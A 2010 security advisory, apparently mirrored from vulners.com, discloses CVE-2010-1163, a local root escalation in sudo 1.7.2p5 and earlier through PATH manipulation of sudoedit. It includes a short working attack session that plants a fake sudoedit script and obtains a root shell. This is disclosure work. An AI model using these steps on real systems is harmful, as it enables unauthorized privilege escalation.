sudoedit local privilege escalation through PATH manipulation

2010-04-2200:00:00

vulners.com

4878

JSON

Security Advisory @ Mediaservice.net Srl
(#02, 19/04/2010) Data Security Division

     Title: sudoedit local privilege escalation through PATH manipulation

Application: sudo <= 1.7.2p5
Platform: Linux, maybe others
Description: A local user with permission to run the sudoedit pseudo-command
can gain root privileges, through manipulation of the PATH
environment variable.
Authors: Valerio Costamagna <[email protected]>
Maurizio Agazzini <[email protected]>
Vendor Status: sudo team notified on 26/03/2010
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
the name CVE-2010-1163 to this issue.
References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163
http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html

Abstract.

While writing an article about the vulnerability outlined in CVE-2010-0426, we
found a distinct security flaw, also related to the sudoedit pseudo-command.
Specifically, the path component of sudoedit is not checked correctly. This
can be easily exploited by a local user with permission to run sudoedit, in
order to execute arbitrary commands as root.

Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),
86(netdev),93(scanner)
sh-3.1#

Affected Platforms.

All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this
vulnerability requires that the /etc/sudoers file be configured to allow the
attacker to run sudoedit.